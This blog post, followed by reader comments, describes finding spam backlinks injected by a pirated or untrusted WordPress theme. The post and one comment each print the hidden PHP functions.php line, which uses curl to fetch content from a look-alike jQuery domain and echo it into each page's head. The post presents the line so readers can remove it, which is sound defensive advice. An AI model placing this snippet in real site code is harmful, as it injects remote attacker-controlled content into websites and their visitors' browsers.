WordPress Hacked: Spam BackLinks

As you may recall, I switched my WordPress theme two months ago, and installed a new theme called PixelPower. If you read my previous post, I had disabled W3 Total Cache Minify and replaced with Better WordPress Minify.

So after successfully implementing the W3 Total Cache minify on another blog I decided to give mine a second chance; the problem I found was that it takes a few seconds for W3TC to write it to disk, and my Amazon CloudFront gets a 404 the first time it tries to hit it … After a second attempt it seems to be working fine.

To my surprise however, while debugging and looking at my html source code I noticed something unusual – WordPress Hacked! a bunch of links were injected pointing to care2.com! So I did a little digging and I found that it was a big problem with jquery being injected by wpstats.org. Not my case, but I did find the problem. Open your functions.php file and if the 2nd line reads:

if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}

Then your theme will automatically add spam backlinks… What annoys me the most is that I only found out now, after two months with the new template. So if you buy WordPress themes, especially from an unknown source – beware of sneaky spam links added to the original theme.

I deleted said line and all the backlinks disappeared.

  • KK

    Thanks! Helped me loads. Combing through my code right now!!!

  • Jeferex

    Great Post, You saved my day! :D
    My WordPress blog had been hacked but now it is ok

    Thanks a lot!

  • Gustavocampeol

    I notice that my site was hacked 3 weeks ago and since that i’m trying to found the problem. 
    Thank you so much, man! 

  • Ademola Oladipo

    This occurence is common among pirated themes. I have quite a few myself and they lurk in some other places beyond the functions.php. Check if the function.php includes any suspicious files with a recently updated timestamp different from the other files

  • Vinicio brasil bahia

    OBRIGADOOO!!!  vc mim ajdou muito aqui no BRASIL ! de SALVADOR na BAHIA , ABRAÇOS.. thank you very much

  • Segalapromo

    thank u for u’r advise my web is can normally again

  • Mladen Vlalukin

    In my functions.php

    if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);} 

    require_once(get_template_directory() . ‘/includes/init.php’);

    I remove, but nothing
    if you can help
    thank

  • http://www.dragonseo.net/ Dich vu SEO

    I don’t know remove attributes.

  • Jevaous
  • Mareksmialy111

    Hehe i had the same thing on my blog http://7hacks.com/

  • http://www.yepi250.com/ yepi

    Great. Really your post is very helpful.

  • Rov